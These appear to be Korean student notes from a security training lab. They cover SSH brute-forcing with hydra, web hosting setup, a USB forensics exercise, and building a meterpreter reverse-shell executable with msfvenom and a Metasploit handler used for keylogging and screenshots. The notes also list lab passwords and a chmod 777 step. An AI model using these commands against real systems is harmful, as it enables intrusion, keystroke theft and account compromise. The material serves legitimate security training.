DAY42
DAY42

장비 실습


사전공격하여 ssh 192.168.0.106 메인 서버에 접속
암호는 공유 서버에 저장되어 있음
master 암호와 root 암호는 동일함

hydra -L account.txt -P mainpassword.txt 192.168.0.106 ssh -s 22253
(master/2345)

=> 서버가 다운되어서 그냥 접속하는 것으로 변경

미션1
메인서버에 접속하여 본인의 이니셜 계정 생성후
이니셜.st.kr이 동작하도록 설정할 것
스위치1: 192.168.0.106(변경되었을 수도..)
스위치2: 125.246.95.253

adduser jyb


  DocumentRoot /home/jyb/public_html
  ServerName jyb.st.kr
  ServerAdmin jyb@jyb.st.kr
  ErrorLog /home/jyb/public_html/logs/error.log
  CustomLog /home/jyb/public_html/logs/access.log combined


st.kr.zone

미션2
ci4를 이용해 서버 점검 페이지를 만들어라!
서버마다 각 계정 부여 후 각자 만들것
일일 점검 내용은 chatgpt를 이용해 스크립트 작성 후 웹화면으로

1. 계정활성화
	ci4.st.kr 구축
2. 호스팅 수정
cd /etc/apache2/sites-available/hosting.conf

  DocumentRoot /home/ci4/public_html/public
  ServerName ci4.st.kr
  ServerAdmin ci4@ci4.st.kr
  Errorlog /home/ci4/public_html/logs/error.log
  CustomLog /home/ci4/public_html/logs/access.log combined



	AllowOverride All
	Require all granted
	Options None


3. writable 권한 바꾸기
chmod -R 777 writable (권한변경)

4. a2enmod rewrite

5. cd /home/ci4/public_html
	cp env .env
	nano .env
	CI_ENVIRONMENT = development (개발자모드 변경) <->production (?)
	에러 뜨면 이유를 알려줌

미션3
칼리 악성코드 작성 후 master@st.kr로 메일 보내기
본인의 ip로 만들어주 보내기

메일
dhcp
nat x
어댑터에 브릿지 > 고정아이피 주기

gns x

dns 125.246.95.253
nslookup st.kr

xshell 
systemctl start ssh

msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.216 LPORT=4444 -b "\x00" -f exe -o /home/kali/ip216.exe (악성코드 생성)

nano malware.rc
	use exploit/multi/handler
	user payload windows/meterpreter/reverse_tcp
	set lhost 192.168.0.214
	set lport 4444
	exploit

netstat -ant | grep 4444

nc -l -p 4444

msfconsole -r /home/kali/malware.rc

keyscan_start
keyscan_dump

screenshot

순수 로그만 보고 침투 흔적 찾기
ssh://125.246.95.253
(master/2345)
(master/8888) root:7777
(master/2222) root:1111


내일!!
미션4
미션1,2,3완료 후 키 인증 방식으로 변경


Bootstrap Example

시나리오3: 서과장 usb 파일 유출 사건


USB 포맷
FAT32

제어판 > 관리도구 > 컴퓨터 관리 > 디스크 관리
EVIDENCE > 디스크 2
>볼륨삭제
>새 단순 볼륨
다음 > 7477(반절) > 기본값 > FAT32
다음 > 7477(반절) > 기본값 > NTFS

[ftk imager]

물리 디스크 추가
sandisk > 정상

이미지 디스크 추가
서과장 유출 > 비정상(unrecognized file system) > 파티션2 분석하기

정상
000000000 ~ 0000001f0
len = 512
partition1 = 2048
partiton2 = 15314944

서과장 
partition1 = 63
partition2 = 41945715

partition 2 
첫번째 블록 지워진 것으로 추정
정상 usb 첫 블록 지워서 비교해보기

www.nfts.com/
www.disk-editor.org/ (초심자 공부용; 구조 보여줌!!)

이미지 파일로 사본 만들기
usb > export
Raw(dd)
Image fragment size 0으로 바꾸기 !!
20250213001

해시값 확인
>verify


[active disk editor]

open disk image
20250213001.zip 선택
edit 

오른쪽 마우스 > allowedit > 수정가능
usb 파티션1~4 00000000로 변경

[ftk imager]
=> unpartitioned space 확인 

복구해보기?